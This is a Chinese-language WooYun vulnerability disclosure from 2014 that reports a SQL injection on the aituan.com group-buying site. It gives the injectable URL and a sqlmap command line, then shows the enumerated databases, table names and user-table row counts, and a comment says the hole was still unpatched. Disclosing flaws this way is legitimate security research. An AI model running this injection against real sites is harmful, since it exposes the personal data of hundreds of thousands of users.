当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054972

漏洞标题:爱团网主站SQL注入(可能导致百万计用户泄露)

相关厂商:爱团网

漏洞作者: Comer

提交时间:2014-03-30 11:36

修复时间:2014-05-14 11:37

公开时间:2014-05-14 11:37

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-05-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

伴随着"公路之歌"中的吉他声,我来了...

详细说明:

感谢某站的友情链接加快了我来到爱团的步伐。
#1 注入点

http://www.aituan.com/duobao/1547

检测类型

sql_1.png

#2 懒了,跑吧

sqlmay -u "http://www.aituan.com/duobao/1547*" --dbms="mysql" --time-sec=2 --ignore-proxy --current-user --current-db

sql_2.png

漏洞证明:

Database: aituan_test
[28 tables]
+---------------------------------------+
| at_ad |
| at_admin |
| at_admin_log |
| at_collect |
| at_config |
| at_feedback |
| at_gift |
| at_gift_consume |
| at_indiana |
| at_indiana_order |
| at_links |
| at_match |
| at_product |
| at_product_attribute |
| at_product_category |
| at_product_count |
| at_product_hits |
| at_product_style |
| at_seller |
| at_seller_count |
| at_seller_notice |
| at_user |
| at_user_address |
| at_user_details |
| at_user_product |
| at_user_score |
| at_user_ticket |
| at_user_verify |
+---------------------------------------+
Database: aituan
[58 tables]
+---------------------------------------+
| at_ad |
| at_admin |
| at_test |
| at_user |
...略
Database: aituan1515
[83 tables]
+---------------------------------------+
| at_activity_guanggao |
| at_activity_visit |
| at_admin |
...略
Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
...略
Database: test
[1 table]
+---------------------------------------+
| at_double_count |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
...略


count了一下aituan库

Database: aituan
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| at_indiana_order | 1390489 |
| at_user_score | 1381200 |
| at_user | 664522 |
| at_user_score_spend | 511283 |
...略


只是测试,没动丝毫数据。

修复方案:

别的先不说,赶紧拎起手中的键盘修复了吧:)

版权声明:转载请注明来源 Comer@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2014-05-14 13:01 | Comer ( 普通白帽子 | Rank:336 漏洞数:40 | 关注安全 | 关注智能漏洞挖掘)

    @疯狗 @finger 貌似被忽略的洞很少有见给分的(貌似也就说所谓的wooyun评价),这个有一定的门槛还是?求科普

  2. 2014-05-14 13:35 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    忽略,还没修补。

  3. 2015-04-11 23:13 | Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)

    sqlmay -/- 我只关注这里